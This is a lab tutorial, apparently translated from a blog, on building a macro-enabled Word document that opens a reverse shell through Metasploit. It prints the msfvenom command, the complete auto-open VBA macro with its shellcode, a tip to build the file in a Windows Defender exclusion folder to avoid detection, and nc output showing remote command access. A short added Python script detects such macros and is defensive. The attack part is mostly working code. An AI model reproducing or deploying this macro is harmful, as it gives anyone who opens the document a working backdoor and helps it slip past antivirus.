Creating a Word document that launches a connect-back shell using Metasploit
In "Creating a Word document that launches the calculator", we created a Word document that launches the calculator using a simple VBA macro. Because VBA macros can call the Win32 API, it is possible to write a macro that executes arbitrary shellcode. Here, we will create a Word document that launches a connect-back shell using the Metasploit Framework.
Environment
Kali Linux 2.0, Metasploit Framework 4.11.4
root@vm-kali64:~# uname -a
Linux vm-kali64 4.0.0-kali1-amd64 #1 SMP Debian 4.0.4-1+kali2 (2015-06-03) x86_64 GNU/Linux
root@vm-kali64:~# lsb_release -a
No LSB modules are available.
Distributor ID: Kali
Description:    Kali GNU/Linux 2.0
Release:        2.0
Codename:       sana
root@vm-kali64:~# msfconsole -v
Framework Version: 4.11.4-2015071403
Generating a VBA macro with Metasploit
Metasploit can emit shellcode in VBA format, and that output can be used as an Office macro as-is.
First, use the msfvenom command to look up the payload name and the options that can be specified.
root@vm-kali64:~# msfvenom --help
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>

Options:
    -p, --payload    <payload>       Payload to use. Specify a '-' or stdin to use custom payloads
        --payload-options            List the payload's standard options
    -l, --list       [type]          List a module type. Options are: payloads, encoders, nops, all
    -n, --nopsled    <length>        Prepend a nopsled of [length] size on to the payload
    -f, --format     <format>        Output format (use --help-formats for a list)
        --help-formats               List available formats
    -e, --encoder    <encoder>       The encoder to use
    -a, --arch       <arch>          The architecture to use
        --platform   <platform>      The platform of the payload
    -s, --space      <length>        The maximum size of the resulting payload
        --encoder-space <length>     The maximum size of the encoded payload (defaults to the -s value)
    -b, --bad-chars  <list>          The list of characters to avoid example: '\x00\xff'
    -i, --iterations <count>         The number of times to encode the payload
    -c, --add-code   <path>          Specify an additional win32 shellcode file to include
    -x, --template   <path>          Specify a custom executable file to use as a template
    -k, --keep                       Preserve the template behavior and inject the payload as a new thread
    -o, --out        <path>          Save the payload
    -v, --var-name   <name>          Specify a custom variable name to use for certain output formats
        --smallest                   Generate the smallest possible payload
    -h, --help                       Show this message
root@vm-kali64:~# msfvenom -l

Framework Payloads (432 total)
==============================

    Name                           Description
    ----                           -----------
    aix/ppc/shell_bind_tcp         Listen for a connection and spawn a command shell
    aix/ppc/shell_find_port        Spawn a shell on an established connection
    ...
    windows/shell_reverse_tcp      Connect back to attacker and spawn a command shell
    ...

root@vm-kali64:~# msfvenom -p windows/shell_reverse_tcp --payload-options
Options for payload/windows/shell_reverse_tcp:

       Name: Windows Command Shell, Reverse TCP Inline
     Module: payload/windows/shell_reverse_tcp
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 324
       Rank: Normal

Provided by:
  vlad902 <vlad902@gmail.com>
  sf <stephen_fewer@harmonysecurity.com>

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (Accepted: , , seh, thread, process, none)
LHOST                      yes       The listen address
LPORT     4444             yes       The listen port

Description:
  Connect back to attacker and spawn a command shell

Advanced options for payload/windows/shell_reverse_tcp:
(snip)
Based on the results above, generating a VBA macro that connects back to port 4444 on 192.168.56.4 looks like this.
root@vm-kali64:~# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.4 LPORT=4444 EXITFUNC=thread -f vba
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
#If Vba7 Then
  Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Jtr As Long, ByVal Xerhfbvq As Long, ByVal Bumokvf As LongPtr, Weldl As Long, ByVal Dxjc As Long, Xmf As Long) As LongPtr
  Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Gowjdhnce As Long, ByVal Hslz As Long, ByVal Cgxo As Long, ByVal Kftmzpye As Long) As LongPtr
  Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Ypdzzkr As LongPtr, ByRef Cnrpsnfhk As Any, ByVal Nrpb As Long) As LongPtr
#Else
  Private Declare Function CreateThread Lib "kernel32" (ByVal Jtr As Long, ByVal Xerhfbvq As Long, ByVal Bumokvf As Long, Weldl As Long, ByVal Dxjc As Long, Xmf As Long) As Long
  Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Gowjdhnce As Long, ByVal Hslz As Long, ByVal Cgxo As Long, ByVal Kftmzpye As Long) As Long
  Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Ypdzzkr As Long, ByRef Cnrpsnfhk As Any, ByVal Nrpb As Long) As Long
#EndIf

Sub Auto_Open()
  Dim Ewtoup As Long, Qkhfci As Variant, Kdhhfhp As Long
#If Vba7 Then
  Dim Hhluw As LongPtr, Lgcpy As LongPtr
#Else
  Dim Hhluw As Long, Lgcpy As Long
#EndIf
  Qkhfci = Array(232,130,0,0,0,96,137,229,49,192,100,139,80,48,139,82,12,139,82,20, _
139,114,40,15,183,74,38,49,255,172,60,97,124,2,44,32,193,207,13,1, _
199,226,242,82,87,139,82,16,139,74,60,139,76,17,120,227,72,1,209,81, _
139,89,32,1,211,139,73,24,227,58,73,139,52,139,1,214,49,255,172,193, _
207,13,1,199,56,224,117,246,3,125,248,59,125,36,117,228,88,139,88,36, _
1,211,102,139,12,75,139,88,28,1,211,139,4,139,1,208,137,68,36,36, _
91,91,97,89,90,81,255,224,95,95,90,139,18,235,141,93,104,51,50,0, _
0,104,119,115,50,95,84,104,76,119,38,7,255,213,184,144,1,0,0,41, _
196,84,80,104,41,128,107,0,255,213,80,80,80,80,64,80,64,80,104,234, _
15,223,224,255,213,151,106,5,104,192,168,56,4,104,2,0,17,92,137,230, _
106,16,86,87,104,153,165,116,97,255,213,133,192,116,12,255,78,8,117,236, _
104,240,181,162,86,255,213,104,99,109,100,0,137,227,87,87,87,49,246,106, _
18,89,86,226,253,102,199,68,36,60,1,1,141,68,36,16,198,0,68,84, _
80,86,86,86,70,86,78,86,86,83,86,104,121,204,63,134,255,213,137,224, _
78,86,70,255,48,104,8,135,29,96,255,213,187,224,29,42,10,104,166,149, _
189,157,255,213,60,6,124,10,128,251,224,117,5,187,71,19,114,111,106,0, _
83,255,213)
  Hhluw = VirtualAlloc(0, UBound(Qkhfci), &H1000, &H40)
  For Kdhhfhp = LBound(Qkhfci) To UBound(Qkhfci)
    Ewtoup = Qkhfci(Kdhhfhp)
    Lgcpy = RtlMoveMemory(Hhluw + Kdhhfhp, Ewtoup, 1)
  Next Kdhhfhp
  Lgcpy = CreateThread(0, 0, Hhluw, 0, 0, 0)
End Sub
Sub AutoOpen()
  Auto_Open
End Sub
Sub Workbook_Open()
  Auto_Open
End Sub
Of the output above, everything from #If Vba7 Then onward is the generated macro.
This macro runs at the moment the document is opened.
Specifically, it places the shellcode in memory with the VirtualAlloc and RtlMoveMemory functions and then runs it in a new thread with the CreateThread function.
Note that with the default EXITFUNC=process, the shellcode terminates the Word process itself when it finishes, which is why EXITFUNC=thread is specified at generation time.
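As an added example that is not part of the original post, the following Python script shows the defender's side of the macro just described: it looks for the VirtualAlloc/RtlMoveMemory/CreateThread declarations behind an auto-open entry point, rebuilds the byte array, and pulls the connect-back address out of the shellcode. The embedded sample macro is a constructed, shortened copy of the one above, and the IP/port extraction rests on an assumed push layout of the reverse_tcp stub rather than on any Metasploit documentation.

```python
import re
import struct

# Constructed sample (not the page's full macro): the three Declare lines, the
# auto-exec subs and a cut-down byte array keeping the sockaddr_in pushes.
SAMPLE_MACRO = '''
Private Declare Function CreateThread Lib "kernel32" (ByVal a As Long) As Long
Private Declare Function VirtualAlloc Lib "kernel32" (ByVal a As Long) As Long
Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal a As Long) As Long
Sub Auto_Open()
  Qkhfci = Array(232,130,0,0,0,96,137,229, _
106,5,104,192,168,56,4,104,2,0,17,92,137,230, _
83,255,213)
  Hhluw = VirtualAlloc(0, UBound(Qkhfci), &H1000, &H40)
End Sub
Sub AutoOpen()
  Auto_Open
End Sub
'''

INJECT_APIS = ("VirtualAlloc", "RtlMoveMemory", "CreateThread")
AUTO_EXEC = ("Auto_Open", "AutoOpen", "Workbook_Open", "Document_Open")

def extract_shellcode(vba):
    # First Array(...) literal, with VBA's " _" line continuations removed.
    m = re.search(r"Array\((.*?)\)", vba, re.S)
    if not m:
        return b""
    body = m.group(1).replace("_", "").replace("\n", "")
    return bytes(int(x) for x in body.split(",") if x.strip())

def find_reverse_tcp_target(sc):
    # Assumed layout of the stub: push <ip> (68 xx xx xx xx) followed by
    # push 0x0002|port<<16 (68 02 00 hi lo): AF_INET plus a big-endian port.
    m = re.search(rb"\x68(.{4})\x68\x02\x00(.{2})", sc, re.S)
    if not m:
        return None
    ip = ".".join(str(b) for b in m.group(1))
    port = struct.unpack(">H", m.group(2))[0]
    return ip, port

def triage(vba):
    # Loader pattern: all three kernel32 imports plus an auto-exec entry point.
    apis = [a for a in INJECT_APIS
            if re.search(r"Declare\s+(PtrSafe\s+)?Function\s+" + a + r"\b", vba)]
    triggers = [t for t in AUTO_EXEC if re.search(r"\bSub\s+" + t + r"\s*\(", vba)]
    sc = extract_shellcode(vba)
    return {"apis": apis, "triggers": triggers, "shellcode_len": len(sc),
            "target": find_reverse_tcp_target(sc),
            "suspicious": len(apis) == 3 and bool(triggers) and len(sc) > 0}
```

Run against the full macro above (for example the VBA source dumped from the document), triage reports the 192.168.56.4:4444 listener as an indicator without the document ever being opened.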
Creating a Word document with the macro embedded
Create a Word document containing the macro above in the same way as in "Creating a Word document that launches the calculator". Note that Windows Defender detects this file as TrojanDownloader:O97M/Donoff.gen!A, so it has to be created inside a Windows Defender exclusion folder.
With the nc command listening on port 4444 of 192.168.56.4, opening the Word document and enabling macros produces the following.
root@vm-kali64:~# nc -v -l -p 4444
listening on [any] 4444 ...
192.168.56.1: inverse host lookup failed: Unknown host
connect to [192.168.56.4] from (UNKNOWN) [192.168.56.1] 58116
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\user\Desktop>whoami
whoami
target-win8\user

C:\Users\user\Desktop>^C
The result above confirms that the command prompt of the machine that opened the Word document can be operated remotely.